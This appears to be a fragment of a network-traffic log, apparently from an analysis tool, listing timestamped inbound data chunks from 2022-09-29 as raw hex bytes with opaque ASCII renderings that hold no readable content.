                                                                                                                                                2022-09-29 12:52:03 UTC37306INData Raw: b2 ea 7c f4 8a b8 25 3e 35 e3 48 9a 1f 94 0d c7 ae 52 4a f6 d2 75 18 25 14 34 e7 01 fa 54 91 22 aa d6 4c d9 9e 81 47 03 b9 22 fa 77 25 5d 4d ec 99 d6 0f cc 39 ef 87 79 9e f3 04 d8 83 c5 4e 99 71 37 39 e5 30 56 35 d4 23 2c b1 4f 44 1b 13 1e 3e 24 7e d5 ce 30 2f f6 6e ea 67 fb 48 23 e2 d7 e4 1d e2 b9 bb 71 cc ff 90 7f 33 14 ab 53 df fc f7 bc ad da 1b 6a ff f2 d3 40 45 1d ca 45 c5 24 72 66 3d 77 70 2e 92 c1 e5 00 58 5e f6 7e 97 ac 58 35 03 fc f0 91 9d 5d 55 93 d1 b2 fe 45 d3 1d 99 f5 78 ed 10 dd 0d 82 8a 93 a1 ec 28 03 bc 26 f6 af 09 20 b8 fb 98 2f fa 9a 51 f9 48 f3 65 52 11 e2 24 93 00 87 9d f9 59 1c bc 85 32 4e cc 9b 63 c5 26 d3 c3 56 6e f8 54 31 25 dd 17 a5 81 5c b2 ba 44 8d 22 49 6e 58 d2 0c 4c 53 d5 1f ed 50 97 0c 74 08 15 41 4a 47 66 07 dd 16 15 75 2a
                                                                                                                                                Data Ascii: |%>5HRJu%4T"LG"w%]M9yNq790V5#,OD>$~0/ngH#q3Sj@EE$rf=wp.X^~X5]UEx(& /QHeR$Y2Nc&VnT1%\D"InXLSPtAJGfu*
                                                                                                                                                2022-09-29 12:52:03 UTC37322INData Raw: 19 34 fd 67 49 9e fb 4f 22 dd 82 79 b0 05 db dc f2 87 ef 03 b0 a1 ad 3d 90 83 64 e6 71 88 8f e4 3b 8c 9b e6 77 24 4b fc 10 ed 16 32 9c ba 72 a3 1d 42 78 02 12 fd 35 b1 e9 7d 75 01 31 32 83 7e e0 e8 80 87 7b cb 0e ee 2f 1d 0a 58 82 ce bd 49 db 15 ba e0 07 56 3d 70 87 ee 02 58 69 26 a3 3d 5a b8 11 fd 16 58 7f d9 5f a2 7d 53 9e c8 95 24 3c f5 07 81 40 4e a5 4c dc 3a b6 5e e2 99 30 eb 0d 26 a6 55 ec 45 a9 f2 f7 cd 06 4b b9 36 84 ae 6f 64 a0 e5 7f 51 d9 41 b6 93 72 22 f6 6c 09 0a 9b b8 8a c8 96 6c 43 a5 ad 37 6d e6 c6 be 51 cb 42 d4 f1 f1 74 31 c3 89 f2 9c b8 30 64 bf 85 f5 df c4 6d 29 1d d8 a6 19 8e 66 1d 63 3e 5f 71 3b 6a ce 2b e6 ac 67 03 e1 6e a4 1b b4 8e e7 48 13 fd a1 1c 9f 83 57 da d8 9f 77 67 8e 46 7d a3 64 f9 42 28 86 fe 01 5b ff 94 0e 4d 0b fc e4 7e
                                                                                                                                                Data Ascii: 4gIO"y=dq;w$K2rBx5}u12~{/XIV=pXi&=ZX_}S$<@NL:^0&UEK6odQAr"llC7mQBt10dm)fc>_q;j+gnHWwgF}dB([M~
                                                                                                                                                2022-09-29 12:52:03 UTC37338INData Raw: 83 c4 8c 09 45 14 0a a9 32 80 bd de 85 c4 9b a5 d3 aa b9 1a c0 e9 ce 31 30 55 a9 91 f9 27 91 da ae 1e 60 92 94 d4 4e d1 d1 e1 a6 04 65 3e b1 9d 35 ab 88 95 a2 99 90 ec b5 db b7 d3 40 30 66 5f 3b c8 07 ad fe 1d a3 16 78 1b 8b 88 ff f8 54 56 4b 30 b9 d5 e5 f6 e9 31 a0 2b ee 1e 8d 15 2a 68 9d b8 b2 8d 4a cb d1 80 c7 1b e2 08 68 21 c5 fb d7 8b fe fe 73 d4 f7 aa b0 da 78 6c a5 74 02 f8 19 54 25 d6 0d f2 fa c6 34 91 ba a8 7f 3e 45 07 e0 f7 ec 7f 1f fb ba 4b 1e 79 5e a4 c3 ab 24 b2 86 5a 98 da d1 22 b0 af ec bd 48 04 82 c8 30 35 d7 93 14 23 80 c7 51 5b 7a 6b d1 81 c2 d4 68 e4 36 7d 0f e3 42 48 47 c0 90 09 9e e5 50 9e ae f6 0f 40 fe e7 bb f7 b3 c7 5a d9 79 58 8e 2a c7 0d 9e 05 33 ac bc 03 cb 5d 60 fb b6 44 07 72 5d 22 e5 18 df 6c c7 79 a5 d7 cc 93 9e c8 b0 eb bb
                                                                                                                                                Data Ascii: E210U'`Ne>5@0f_;xTVK01+*hJh!sxltT%4>EKy^$Z"H05#Q[zkh6}BHGP@ZyX*3]`Dr]"ly
                                                                                                                                                2022-09-29 12:52:03 UTC37354INData Raw: 4f 6e e7 fb 5d f9 c7 46 cb 45 a4 84 a8 55 f3 f2 38 2d 93 0e e9 53 a3 e2 47 dc d3 ae 19 95 d5 e1 b8 b1 fb df 0a d7 25 94 85 2a 74 fb 8d c6 35 f0 7b 47 bf cb d8 9e 51 be db ba 83 3d 7e ca 54 40 bb 9c b8 65 c6 9b 42 74 d3 78 7b 0e 8c 92 0e 3a d9 ad 71 f5 c6 ad 96 63 ad 17 24 e2 c7 e0 ab 89 80 bb 41 a0 73 65 0f 00 8b c5 cb f9 a1 31 27 af 26 87 97 35 64 95 cb ba 6e f7 b9 88 2d 8a d6 f1 1d 6a 71 62 8d da 7f bb 26 56 6a 79 8c 8a 6f 08 71 43 64 3b a8 11 98 d9 ea 4e 61 ec 03 46 4e dc b8 ce 34 41 69 10 0d a5 3a 86 6a 79 a6 b0 40 0a 54 90 bb 92 ad 1a 4d 0d ec 4c 4d ee ce b9 c7 76 6b 9c 38 4f 80 4a e8 4c cd cc 5e 38 48 a8 2b b0 cc 62 0b b3 4a ee f7 9d 1f 21 5e 29 72 9f 58 de e5 dc 64 93 c9 c4 6d 1a 34 71 f3 e4 79 c5 35 2c 83 03 5a 5a 1a fe 67 43 af 63 a5 f9 bf 59 cb
                                                                                                                                                Data Ascii: On]FEU8-SG%*t5{GQ=~T@eBtx{:qc$Ase1'&5dn-jqb&VjyoqCd;NaFN4Ai:jy@TMLMvk8OJL^8H+bJ!^)rXdm4qy5,ZZgCcY
                                                                                                                                                2022-09-29 12:52:03 UTC37370INData Raw: 15 39 47 9e 94 d3 dc 48 9c b2 97 34 8b 37 d7 1d d2 e5 fe fc a7 1d 0d 1f ad 83 c3 84 15 b9 e6 40 23 ed 07 b9 c8 cf 99 14 15 63 96 67 58 ce 54 2b bf a7 98 64 ff 94 e5 54 2d 48 94 ec 5d ea 64 d1 06 fa e1 f1 c5 84 86 91 d2 f3 f2 97 40 5a 40 ef 97 53 34 de 9d 74 a5 07 a0 33 a7 cc 15 1e f8 fc 73 dd eb e3 57 ca 1b be 5e 54 43 41 6d b3 91 45 33 f5 99 a2 df 17 a2 51 ee d3 cf a0 13 11 3f ae a5 73 17 d3 c6 af 20 13 2a bf 49 fe 58 22 e3 d7 79 c9 6c fd da 43 fc 35 0f 83 c6 d6 95 4b 5b 3c d5 15 dc 4d 88 65 41 58 c1 bf 02 88 53 52 bc 0b 84 0d 5f bf f0 0c c6 90 12 69 ab 7b 56 cc 23 66 c5 21 ea 5a 9b b4 0a 2c 95 18 8a 5e a9 ba e0 91 55 52 63 a9 cb 9a 5e 2b fd 3a 38 06 c5 28 23 44 f9 97 6b 6e 6d 34 7c af 31 e0 27 25 e7 44 0f 22 b3 89 de 6e fd 84 76 10 6a 53 77 14 37 d5 45
                                                                                                                                                Data Ascii: 9GH47@#cgXT+dT-H]d@Z@S4t3sW^TCAmE3Q?s *IX"ylC5K[<MeAXSR_i{V#f!Z,^URc^+:8(#Dknm4|1'%D"nvjSw7E
                                                                                                                                                2022-09-29 12:52:03 UTC37386INData Raw: 78 10 19 4d d3 1b b9 4f 2e 64 6e 29 12 33 3b a9 63 40 4b ef 8f ed b8 63 f7 a7 66 d2 51 84 7e 4f fd 77 64 3f 96 99 bd 80 e8 28 bc 5e e0 39 f7 8d 46 e0 4f b4 5d 45 75 7f 05 1a 79 99 34 97 a6 5c f7 9f 8b 9c 0d 6c f3 e2 26 7a b8 ff e0 3f 50 75 76 fb 03 b9 3c fc 97 82 7c 9b 2c f4 56 9d 2b 35 01 1c f3 dd 9f 48 e4 0f 39 ac b7 ff 46 5f 01 e3 a3 e4 24 46 12 29 a0 ee d1 98 65 88 8e 2e e4 52 12 2b 17 e3 27 82 74 43 c3 e6 30 b4 be bd 72 fd 81 3b 70 42 d1 35 65 24 57 58 d1 6c 6c d9 c8 c0 da 8e c8 51 ae 6f 6f d4 ce 96 82 1c df 83 59 0e 40 2d 1b 8f 68 32 34 27 3a 3d b2 3f 12 23 e9 3b da 39 00 42 b2 67 4f 6a d9 d0 0b 21 6c 61 60 10 40 39 a7 fb 4e e9 1c 6e e1 eb 3c 35 5a ef a6 a4 d3 b2 c9 0d 5f 18 cc b4 50 e8 56 6c a6 72 6c 89 f8 c8 22 2e 3d 0d 63 fa a4 bf 81 c8 8a 17 ce
                                                                                                                                                Data Ascii: xMO.dn)3;c@KcfQ~Owd?(^9FO]Euy4\l&z?Puv<|,V+5H9F_$F)e.R+'tC0r;pB5e$WXllQooY@-h24':=?#;9BgOj!la`@9Nn<5Z_PVlrl".=c
                                                                                                                                                2022-09-29 12:52:03 UTC37402INData Raw: f4 0c 18 d9 75 de 35 40 ca da 95 f4 d2 c3 b6 2b 12 ce 83 15 a1 5b 2e 9b 8c 76 69 e6 75 6c c2 99 f8 6c 37 ae 4e a9 ce 7e e6 6b 2d 39 02 b4 28 10 f1 b0 53 d2 5d c0 f3 1c e0 a6 4c 66 f1 d4 bf 15 cc 02 f0 de a0 46 d2 d2 54 81 2c a6 8e f6 8b 5c c9 bc a6 38 7e 8d fb 36 cb 16 2e e8 76 a1 6c a9 2c 1d b7 51 cb 32 77 2a 65 46 c6 87 45 29 b9 03 0e 6f b7 49 a2 ed 12 9b 03 f0 89 6b e9 b3 03 83 49 4c 43 03 72 42 e4 86 d8 4f ef d1 fe a8 54 56 77 64 b4 b4 40 a6 c0 d2 86 ae fb 0e d9 fb 07 9f ad 10 7f e0 99 69 15 2d d8 b5 94 91 2a 31 4b e6 a9 e2 1c 6a 70 ad 81 8d 5a 50 f5 b3 93 6a 3e 54 5e 24 ac 7b fc 98 3d 00 fd 1d 18 7b 19 79 56 f0 d1 22 4f e4 8f 64 8e 0c 0d dc 1e 37 08 3c c4 d1 84 37 35 2f e7 41 4c ec 96 43 e5 e1 fb 83 3d 46 21 b8 90 0b 15 c0 d5 c1 0a a3 97 f7 58 96 a3
                                                                                                                                                Data Ascii: u5@+[.viull7N~k-9(S]LfFT,\8~6.vl,Q2w*eFE)oIkILCrBOTVwd@i-*1KjpZPj>T^${={yV"Od7<75/ALC=F!X
                                                                                                                                                2022-09-29 12:52:03 UTC37418INData Raw: 2a d6 e3 c8 eb 30 dc 84 6e d7 9b 14 9b e4 07 33 e4 cd 7b ff f0 dc 68 06 f0 76 fd ff 49 f1 fb e2 8a 01 bc 16 b7 98 7d 5f e7 b9 95 21 76 1d 7c f2 44 77 69 bd 92 05 ac a5 ed 92 d8 84 31 36 5d 7c 41 99 83 5b d9 61 0f c1 89 b5 7e ee 7d 6a aa 48 44 cc f8 15 db 04 69 3b d8 aa 61 6b 53 2d 15 76 91 ba 51 58 c4 18 e5 a7 90 32 3b 0d a2 af 1b 9d cd 4e 53 de d7 3b 75 3e 83 d7 12 ac 63 8e 2d d9 94 6d 77 3a 12 ed 0c e7 16 42 72 d8 26 dd de 17 33 83 b2 3d 5c 2c f1 5c b0 20 ae 88 cb 6b 0c b8 e9 46 3c 55 fa 95 0a 6f a9 be e7 28 18 95 4a 78 6d da 02 39 05 ca d4 78 f4 e6 3c 74 72 5e ba 2e 6c 19 5d 30 35 6d 46 73 c3 5e 95 f3 fc 73 b6 a2 0e ad bf a9 d4 80 d8 2a 93 4d d0 e8 84 5f 3f 31 ad 27 a8 78 76 6c 18 7f 3c 89 43 c5 2c 5d 41 3f a6 fa 15 1a 80 61 4f de 15 f2 9c d4 8c 8f 95
                                                                                                                                                Data Ascii: *0n3{hvI}_!v|Dwi16]|A[a~}jHDi;akS-vQX2;NS;u>c-mw:Br&3=\,\ kF<Uo(Jxm9x<tr^.l]05mFs^s*M_?1'xvl<C,]A?aO
                                                                                                                                                2022-09-29 12:52:03 UTC37434INData Raw: ca 31 63 58 7b cf 9c b7 73 44 83 1b 0a 19 ad 68 5f 70 de 59 b4 7a 90 05 da 35 63 d2 ef 1f 49 dc c8 13 90 60 20 b9 f0 33 28 3f 65 0b b4 1b 86 32 2c 6c a8 3e 99 41 ad b3 03 53 c1 11 e4 3f 70 20 9f 8a 43 4c 73 69 50 82 20 0c b8 29 3b ab a7 10 99 ca 41 db e2 7a 18 0e 88 39 18 0b 69 be b6 66 2c 70 f4 11 8a c2 15 5e 2d ad 52 4c 84 58 07 29 45 ca 71 cb 44 dd ff bd db a8 b0 03 77 42 1d 54 6b 8b 87 84 1a d8 f7 31 b2 a5 91 29 98 06 4a 1e b6 2d b0 d0 29 cf 81 71 69 56 f5 f2 18 d5 c6 39 7f 86 a2 93 89 e1 16 89 16 66 28 7c b3 a4 33 49 70 31 5e ef c4 31 e8 48 46 a7 44 fc 20 fe 6d 7e d0 0d fd a0 fb 94 fa f3 62 46 fb 93 84 1a 1d 64 7c 09 e0 be c3 9c b9 13 d8 66 82 20 c1 dd 3e 1e 68 b1 4c 96 cf 5b 2e 77 19 1c e2 0f 6e 25 a4 39 75 d3 30 a6 06 24 89 b2 9b b0 32 2f 8c a9 7b
                                                                                                                                                Data Ascii: 1cX{sDh_pYz5cI` 3(?e2,l>AS?p CLsiP );Az9if,p^-RLX)EqDwBTk1)J-)qiV9f(|3Ip1^1HFD m~bFd|f >hL[.wn%9u0$2/{
                                                                                                                                                2022-09-29 12:52:03 UTC37450INData Raw: c6 3e 7c 9f f1 98 cf 49 64 6b 3f f5 27 e1 84 64 24 51 4b 00 c9 73 5f f3 ea b5 90 b8 66 79 fa c6 5f 4f 1e b2 22 e9 f5 11 94 63 e2 fa 17 22 5b ef c3 5c 83 f0 f7 bd 01 7e b4 42 e2 73 10 ee a2 f0 76 18 f4 e8 29 0a c0 e6 db 3b 14 0b 64 df d4 2b 69 99 d3 88 9a 22 6c ae 6c 0f 3a 54 53 1d b6 11 19 75 8b 12 33 e8 e4 fa 35 10 b9 d2 8b 23 45 89 85 ad ee b0 2c b6 3a c8 b4 5b 91 05 b8 95 6d 48 f8 f5 30 ae 02 48 a8 57 e9 1d d1 66 fc 25 83 fc 38 da 57 79 a6 37 d1 39 2e 94 d3 b4 e7 e4 3d f7 82 d2 b4 30 31 03 bb d4 99 af 1b da 16 8c f3 79 ac ff c5 36 3e f6 f0 7b 82 24 ae 4b ea 93 da 76 85 2c 60 93 87 b7 32 c5 97 89 01 f7 d6 09 ff eb 6a 82 47 af 79 b6 d1 38 d6 7c ff 73 67 79 29 93 80 a9 d7 08 1d 0e 68 07 29 2f 25 dd 95 da 77 d0 c3 99 6c d2 f8 b5 9e 88 0b e2 9c 43 42 a7 6c
                                                                                                                                                Data Ascii: >|Idk?'d$QKs_fy_O"c"[\~Bsv);d+i"ll:TSu35#E,:[mH0HWf%8Wy79.=01y6>{$Kv,`2jGy8|sgy)h)/%wlCBl
                                                                                                                                                2022-09-29 12:52:03 UTC37466INData Raw: be d7 1e cc fa a9 3e ad 0d 6a f6 d6 f4 a7 31 0b 0c ba 1e 1e 33 5f e1 71 c2 be 7e 2d 45 20 46 6f 07 23 25 c8 69 ca 8c a0 cc 4c 56 62 53 e5 48 87 9b 97 23 b8 95 e1 85 1e 55 5a a7 90 4c c7 df f9 db 85 4f 22 eb 1a 13 27 71 ad 77 5a 55 11 7a 12 ad e4 23 31 ef 6c ef fc 9e 7a 6c c3 a7 11 d9 66 e8 01 a9 9b 45 43 83 cc 2d 70 2d d5 69 bc 5b 2e b3 1e 88 9d 02 68 ac b7 4f fd f0 7b 8b a2 66 34 e5 b7 7d 0c 54 ef 64 0a b2 2c b2 a6 fe 13 8e 52 38 d4 5b 2c de 92 37 21 c1 ee d8 ec 82 a1 3d 91 bf 7e 3b 07 96 05 39 d8 74 23 77 6d 40 33 5e 47 37 cf 45 2f 4e a7 e0 78 03 b7 18 51 34 01 a7 2b 86 21 79 9d 7d 6e 95 3e 89 53 71 a6 3b 48 ba 06 e1 ca 67 d6 15 f9 20 80 d8 3f 55 34 57 45 73 69 7b a7 09 fe 86 e7 1c f8 8a 1b 26 04 86 17 e2 24 cc 9d e4 3d ee 7d 82 ae dd 1a be 3b d4 b1 aa
                                                                                                                                                Data Ascii: >j13_q~-E Fo#%iLVbSH#UZLO"'qwZUz#1lzlfEC-p-i[.hO{f4}Td,R8[,7!=~;9t#wm@3^G7E/NxQ4+!y}n>Sq;Hg ?U4WEsi{&$=};
                                                                                                                                                2022-09-29 12:52:03 UTC37482INData Raw: 22 94 48 a9 e3 c2 ec 24 52 bb f2 c4 a5 29 23 35 d5 ed 29 c3 c6 4f 3a 95 dc f0 1d 68 30 2c 76 fb bb f8 91 eb 23 3c 21 17 25 cf 55 bf 7e 85 bd f0 74 2d 54 d9 d5 48 3b 21 e8 d2 1e 79 ac f9 00 43 c0 dd b8 6f 38 eb 8b fe 35 1e 32 dc 41 30 ff 66 64 75 8d 87 23 a7 e9 c8 56 1f 6f ab 2e 23 0c 8c 78 ff 78 2c a0 57 14 76 ca 3e 3e 24 93 77 3c 8d bf 20 4b 8d 6f 6f 06 a5 da 07 e6 97 e7 44 e0 b1 48 37 51 a0 28 3e 79 c9 68 15 5d 06 3e ea 1c f9 2e 2b d3 5f ee a1 16 49 19 bb 1f d4 ac 29 ae d6 fc 4f 94 6f f5 42 9b ab 83 7d 19 a8 0c f9 85 55 5f 89 9f 48 8c 58 21 5b 73 2a 8b f2 28 47 40 41 9b 41 0c a7 18 aa 12 7b d3 5c 7f 8c e7 57 a5 c5 63 1d c3 ce 7b d8 69 c3 d8 53 03 17 ed a5 20 4e bc 28 82 7e b8 f3 fc ba 65 2c 54 c2 26 fa 2e 2d 95 ea fc 6b cd ac 18 c3 99 52 7b 80 1f 99 60
                                                                                                                                                Data Ascii: "H$R)#5)O:h0,v#<!%U~t-TH;!yCo852A0fdu#Vo.#xx,Wv>>$w< KooDH7Q(>yh]>.+_I)OoB}U_HX![s*(G@AA{\Wc{iS N(~e,T&.-kR{`
                                                                                                                                                2022-09-29 12:52:03 UTC37498INData Raw: 4e a8 bc 96 ef 45 e1 11 5c 03 fa 1b dd 29 00 94 48 df 8c 82 e5 44 dd c3 03 44 4f fe 6c 39 91 ea bf ab 07 8d 66 6b cb 25 8d fa ff a9 72 0c 3a 5a 13 6e d0 49 23 64 2e a8 ee 22 86 ef 9c 88 94 33 c1 35 b5 8f f2 5f c5 d2 5e 61 81 2a fe 05 22 68 e9 b1 20 47 0c e8 e4 04 a0 59 42 a7 04 40 f4 e8 76 c3 7d e9 4c 0a b9 d3 f4 31 bc aa be 7b cd ab 00 6c f1 be c6 d2 79 bd 3c 88 4b f8 bc 17 77 8a 5d c3 78 c4 9c 35 f2 b5 bb 9b ab ff d4 d5 b6 28 8a 5e 41 39 e3 54 12 50 12 72 a4 d2 1a 78 02 3b bb d3 6d b0 9c d5 c0 04 8b 39 8e 24 71 e6 c2 35 25 28 a4 5c 06 1c 35 33 17 1a ec 2e b7 c4 57 f4 4b ab 5d f7 4e 05 ca 0b 5e c3 8d 20 d8 85 f7 39 0f 5c a9 fe 2e f6 e6 8c b7 51 4d 70 b2 cb e7 d2 67 e7 11 32 67 af 65 5c 18 69 7b 15 bf 85 13 d9 95 28 61 3f d0 7d 44 1b 11 9d 32 45 dd 6e 22
                                                                                                                                                Data Ascii: NE\)HDDOl9fk%r:ZnI#d."35_^a*"h GYB@v}L1{ly<Kw]x5(^A9TPrx;m9$q5%(\53.WK]N^ 9\.QMpg2ge\i{(a?}D2En"
                                                                                                                                                2022-09-29 12:52:03 UTC37514INData Raw: fc 82 e0 3b 5b 0e f7 1d d6 04 37 79 3e e2 67 4d 37 6d cc c3 d9 d5 47 90 6e 84 b8 7e d6 5f d2 5e 08 39 74 e4 db 9f e8 28 69 4e 98 45 48 b2 fc b4 28 03 48 82 bd fc b2 93 c8 34 78 f5 9f 53 9d a4 7b 62 30 f0 b6 3f 62 e0 b2 b6 68 eb 32 48 f2 32 f0 5c d7 fc 1f 7a 78 c5 2f 16 6a 30 de 29 25 f8 25 12 2a de 26 07 1f 4e cb 96 47 48 d2 c1 98 55 b6 b0 11 69 10 1b e6 57 dd 82 51 f7 51 d7 bb cd 1d a7 0a 56 58 ce d2 30 5f 42 91 03 a6 15 61 60 82 fc 97 bd ce 9e 67 f0 a0 a2 1c be 37 9e bc f3 ba 47 b8 39 15 e4 03 a5 11 58 0a 06 c2 ce ec 6c fa 8e 15 7a 45 6b 0b c7 cf 02 88 5e 7c bc f0 18 cc ef e9 f7 ae 0b 9c 57 80 71 01 3b 88 ff 5a 1e e6 48 29 55 f5 df e4 d7 8b 74 50 08 d1 18 85 66 08 9d fe c6 dc 17 72 7c 0e 3a 82 2e 21 0a d5 8f 5c 04 0a 1e 6c d2 2b e6 90 3b b3 c8 2d 25 28
                                                                                                                                                Data Ascii: ;[7y>gM7mGn~_^9t(iNEH(H4xS{b0?bh2H2\zx/j0)%%*&NGHUiWQQVX0_Ba`g7G9XlzEk^|Wq;ZH)UtPfr|:.!\l+;-%(
                                                                                                                                                2022-09-29 12:52:03 UTC37530INData Raw: c0 33 88 5a d0 a7 98 dc 9f bd 21 80 62 3d cb 61 9c 88 ac 66 c9 13 55 2d ec 74 6d e8 cc d8 2b 37 6c 9f 99 0d 79 0b ae a0 bf fb 23 ad 3c c3 37 f7 63 b8 0c 92 a8 44 9d 1e f4 7a ad 16 13 c4 16 2a c8 cb 10 00 3c a1 0d 00 4c 28 99 e5 d6 78 5a 89 ab 8f 1b 7f 6d 5f 53 d4 cd 41 4e 9f 00 ae 8c 84 61 30 b7 45 85 f6 dc 86 48 8d 1c 9e dd 04 15 b8 a5 ec c3 4b dc 30 61 7b ab 9b f3 92 59 7d a9 a1 0b e9 ee ec bd de fe 39 19 66 5a 62 e5 fd 74 04 c0 00 f9 1c f8 a6 e0 91 73 f4 2f bc 4f 0b 8b b2 ff 01 49 dc c3 38 02 0e 54 d5 33 a8 57 2a cd 0a 2b d7 58 9d 24 92 2e 79 1a 5e 91 bd 2e 44 1d f2 92 18 30 49 34 80 c3 ea d8 a4 95 d1 b4 81 e7 20 5d 26 f0 2c 5a 0e ef e9 97 c1 68 b5 f2 2b 1a 02 b7 f9 97 86 08 cc 88 e7 6a 26 44 6b e4 85 ec 69 08 65 46 30 fb 96 f0 57 2e ea 0d 96 8a b0 06
                                                                                                                                                Data Ascii: 3Z!b=afU-tm+7ly#<7cDz*<L(xZm_SANa0EHK0a{Y}9fZbts/OI8T3W*+X$.y^.D0I4 ]&,Zh+j&DkieF0W.
                                                                                                                                                2022-09-29 12:52:03 UTC37546INData Raw: a1 32 83 d3 8c ad 41 df ad 4b eb 32 d3 55 61 ff 23 2d f1 89 34 4e cb b0 3b c4 a8 81 ee 85 e7 05 c9 f2 2c 99 5b 9b cb d0 14 5e 30 6e 81 22 bd 86 0b d9 c7 51 22 72 86 d3 a4 42 53 e7 21 37 be 2d 3f a6 3f 72 65 03 af ca dc 67 1c b4 38 43 04 41 65 c4 db eb 29 a2 5e 16 b3 08 b8 e1 01 ab f6 c6 48 2c 19 22 55 21 cd f7 e8 aa a2 10 56 43 8e 13 93 a4 f2 c2 19 40 c4 02 c6 33 2c c0 44 20 bd 54 6c 13 76 3e bb 9b e0 3d e4 40 f8 9e f4 2a a6 92 01 81 70 f2 9b e6 4d 7a 6a 9e 7a 2d 51 25 84 25 87 75 ab 2b 45 af 93 ff c6 72 25 58 0a 0e a1 0f c4 5d 47 17 b6 0a f1 a4 44 13 2e e6 3a 95 89 15 04 26 27 a4 60 f4 38 fd 72 0d 84 06 dd 9c e4 07 18 a2 87 b6 6e 07 7f 6f 02 84 6f cc c1 f9 e6 3f 1d c9 54 a5 08 46 52 66 b4 20 b5 24 3f 89 6c 0f 60 2a e3 6a 29 41 e2 93 f8 e0 3e 7d 54 ff 16
                                                                                                                                                Data Ascii: 2AK2Ua#-4N;,[^0n"Q"rBS!7-??reg8CAe)^H,"U!VC@3,D Tlv>=@*pMzjz-Q%%u+Er%X]GD.:&'`8rnoo?TFRf $?l`*j)A>}T
                                                                                                                                                2022-09-29 12:52:03 UTC37562INData Raw: d3 8c b7 f6 f5 51 5a b3 26 98 91 4f 8c d9 5f 26 60 cd 0b c1 c2 8c 82 41 bc 3c ab f8 f9 b5 41 c4 ec be b7 9b 79 0e b5 9c 8d e3 34 f2 c8 c8 0b 21 9e 1b 8f d0 f3 6d 87 74 0a 0f 44 71 99 da 98 7e 7c 07 4a 7e 9c 7c a5 df 17 10 31 37 93 ea 22 76 39 46 d1 7f 66 dc 01 85 ba 63 df 13 de 63 44 41 f2 e8 f7 cf 58 9b fe fa df 4a 93 84 b0 1c 73 d7 34 2f 65 fa 98 02 9d 10 81 82 db 87 0f e6 d0 e1 bd fc ee 66 4a d5 aa b2 69 11 d2 02 a0 e8 61 90 54 83 8a 46 b4 9c 89 70 6f d8 0f f7 36 ba 33 b0 6f 9c 79 cf 79 c9 c9 54 fd a8 db e5 c2 e0 6f 84 b1 9a 7e 5d e7 e5 87 81 79 32 84 25 b7 58 2a 48 97 55 c4 3f b4 fa 76 1c f9 3d 34 30 55 2e a3 8f f1 1f 8a 67 77 02 d5 5e db 19 8d 7b b5 9b 4b 63 ad e5 06 87 42 4c aa f5 32 88 fd c9 68 21 ff fe 2e d4 58 9c d0 2a 56 32 54 f8 7b 1a 42 fd 33
                                                                                                                                                Data Ascii: QZ&O_&`A<Ay4!mtDq~|J~|17"v9FfccDAXJs4/efJiaTFpo63oyyTo~]y2%X*HU?v=40U.gw^{KcBL2h!.X*V2T{B3
                                                                                                                                                2022-09-29 12:52:03 UTC37578INData Raw: d6 5d 59 e9 f9 d0 98 99 35 e6 30 74 fb 88 8f 50 cb a5 e0 6d 7e ee e4 55 f3 1e e5 17 df 9f 3a 82 55 e4 d0 d3 51 06 12 69 15 6a e3 65 17 bd d5 dd f3 bb 3e f2 b6 5c b8 60 00 b5 2c 44 16 10 7f f4 22 5d 28 05 f9 3f 9a 5e f6 b0 d7 65 91 b9 64 ac c1 3a 4f fa ec 42 6d 2a 28 26 d3 be a2 e2 e7 14 ea 65 90 78 dd 38 0b 47 a9 41 19 e8 bf 32 f8 fe 99 3d bb b7 67 27 8f a1 54 57 14 14 28 07 cc 4e ab 27 12 3c 28 d3 10 9c e6 74 f8 5c b4 60 89 ef 8b 04 9d 83 42 0b 73 ed ab 97 6a 2c e7 f6 8d 07 a8 45 7f 31 f6 c4 db 2b 2a ce 07 31 4d e3 03 26 f2 3c bd 1a ba 6a fa 10 05 e0 53 6d 05 3c 0d 23 a3 73 83 3b 44 83 eb 30 e6 1a 54 8c 2c ef 37 d9 ba 57 11 20 fb 3b 03 9a 40 72 77 7c 2e d3 b0 35 b5 6b 1b e4 33 28 4a 97 30 a7 a1 ce f0 3d 48 65 88 d8 00 d0 60 96 c4 e8 90 f4 1f d1 a4 ed 14
                                                                                                                                                Data Ascii: ]Y50tPm~U:UQije>\`,D"](?^ed:OBm*(&ex8GA2=g'TW(N'<(t\`Bsj,E1+*1M&<jSm<#s;D0T,7W ;@rw|.5k3(J0=He`
                                                                                                                                                2022-09-29 12:52:03 UTC37594INData Raw: 07 80 a9 21 0c 01 10 36 24 e9 41 37 c1 a7 8c 24 06 20 a8 1e 96 e8 42 e9 d9 1e 43 cb c2 a0 3e 84 50 a3 75 78 3b 91 ca 46 b8 6f 27 5b c8 6a de c2 a2 28 a6 ea 43 25 f7 4f c6 14 53 7c 79 97 18 5a af 01 9f ae 8f 10 13 0b 67 61 3b 91 ef 98 2f f4 19 a5 d7 c1 f3 89 2d c7 f8 e5 20 71 48 01 d7 5c 09 a6 38 3f 63 95 33 85 27 63 d5 6e 31 cc 70 72 40 dc d3 80 3b 88 0a c2 e3 c3 91 9a 4d a5 ee 1c 35 d0 eb ae 99 c6 5d a3 53 7b b6 bf 23 c4 23 9e 51 78 58 8b 80 07 4e 28 84 78 25 53 e0 00 46 06 81 8e 32 8c f4 de c5 02 b1 94 b8 0b 40 20 a3 8f e5 af fb ce 40 8c a6 5f 4f fd 18 95 98 54 a8 2e 33 26 33 df 91 05 6c ad 21 57 40 5f 43 df f3 cf b9 bd d2 62 64 ad f2 8f ff c6 82 73 38 fb 25 f0 2c f5 33 6c 7d 81 ab e2 d2 f0 1d b7 1e fc 12 2b f6 4c fb 8b 50 6c fd 3f 11 7a 9d 27 62 7c f6
                                                                                                                                                Data Ascii: !6$A7$ BC>Pux;Fo'[j(C%OS|yZga;/- qH\8?c3'cn1pr@;M5]S{##QxXN(x%SF2@ @_OT.3&3l!W@_Cbds8%,3l}+LPl?z'b|
